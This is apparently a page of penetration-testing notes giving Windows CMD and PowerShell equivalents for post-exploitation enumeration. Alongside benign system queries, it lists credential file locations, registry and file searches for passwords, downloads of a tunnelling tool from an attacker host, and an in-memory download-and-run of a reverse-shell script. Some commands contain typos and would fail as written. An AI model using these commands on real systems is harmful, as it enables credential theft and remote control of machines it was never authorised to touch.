Commands

To understand Powershell working and commands formation do checkout

Commands used in post exploitation for CMD and Powershell variants

C: command for cmd
P: command for powershell

System information

C: systeminfo
P: Get-ComputerInfo

Grep

C: findstr
P: Select-String -Pattern "OS:"

Piping

|
C: systeminfo | findstr "OS"
P: cat test.txt | Select-String -Pattern "OS"

User name

C: whoami [or] echo %username%
P: $env:UserName

Machine name

C: hostname
P: $env:DomainName [or] $env:Computername

Users

C: net user [or] net user /domain
P: Get-LocalUser

Information about the user

C: net user dnoscp
P: Get-LocalUser dnoscp

Groups

C: net localgroup [or] net localgroup /domain
P: Get-LocalGroup

Get Group members

C: net localgroup Administrators
P: Get-LocalGroupMember Administrators

Get the network adapters

C: ipconfig [or] ipconfig /all
P: Get-NetAdapter

Routing Table information

C: route print
P: Get-NetRoute

Open ports

C: netstat -ano -p TCP [or] netstat -ano -p UDP
P: Get-NetTCPConnection

Scheduled Jobs

C: schtasks
P: Get-ScheduledTask

Running Process

C: tasklist /svc
P: Get-Process

Starting a service

C: net start Themes
P: Start-Process -FilePath "sort.exe"

Installed Drivers

C: drivequery
P: Get-WindowsDriver -Online -All

Last upated information

C: wmic   qfe get Caption, Description, InstalledOn, HotFixID  
P: (New-Object -com "Microsoft.Update.AutoUpdate"). Results | fl

Juicy files location

C:\sysprep.inf
C:\sysprep\sysprep.xml
%WINDIR%\Panther\Unattend\Unattended.xml
%WINDIR%\Panther\Unattended.xml
C:\Users\userName\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

Find files

C: dir /s /p /*.txt /*.xml
P: Get-ChildIten -Path . -Include *.txt,*xml -Recurse -File -Force -ErrorAction 'SilentlyContinue'

Search for a string in a file

C: findstr /si "password" *.txt,*.xml
P: Get-ChildItem -Recurse . -Filter *.txt,*.xml | Select-String "password"

Serch registry for passwords

reg query HKLM /f "password" /t REG_SZ /s  
reg query HKCU /f "password" /t REG_SZ /s

Running Services

C: sc query
P: Get-Service [or] Get-Service | ? {$_.Status -eq "Running"}

Information about the running processes

C: sc query "Spooler"
P: Get-Service "Spooler"

Copy a file

C: copy source_location destination
P: Copy-Item source_location -Destination destination

Move a file

C: move source_location destination
P: Move-Item source_location -Destination destination

Download a file

C: certutil -f -split -urlcache http://10.10.10.10/chisel.exe -outfile chisel.exe
P: Invoke-WebRequest -Uri http://10.10.10.10/chisel.exe -OutFile chisel.exe
P: (New-Object System.Net.Web.Client).DownloadFile("http://10.10.10.10/chisel.exe". "chisel.exe")

Exeucte powershell scripts directly from the memory

P: Invoke-Expression(Invoke-WebRequest -Uri "http://10.10.10.10/PowerShellReverseTCP.ps1" -UseBasicParsing)

# Can be aliased as
iex(iwr -uri "http://10.10.10.10/PowerShellReverseTCP.ps1" -usebasicparsing)

PreviousPowershell NextHackthebox

Last updated 2 years ago

Was this helpful?

C:\sysprep.inf C:\sysprep\sysprep.xml %WINDIR%\Panther\Unattend\Unattended.xml %WINDIR%\Panther\Unattended.xml C:\Users\userName\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

C: certutil -f -split -urlcache http://10.10.10.10/chisel.exe -outfile chisel.exe P: Invoke-WebRequest -Uri http://10.10.10.10/chisel.exe -OutFile chisel.exe P: (New-Object System.Net.Web.Client).DownloadFile("http://10.10.10.10/chisel.exe". "chisel.exe")

P: Invoke-Expression(Invoke-WebRequest -Uri "http://10.10.10.10/PowerShellReverseTCP.ps1" -UseBasicParsing) # Can be aliased as iex(iwr -uri "http://10.10.10.10/PowerShellReverseTCP.ps1" -usebasicparsing)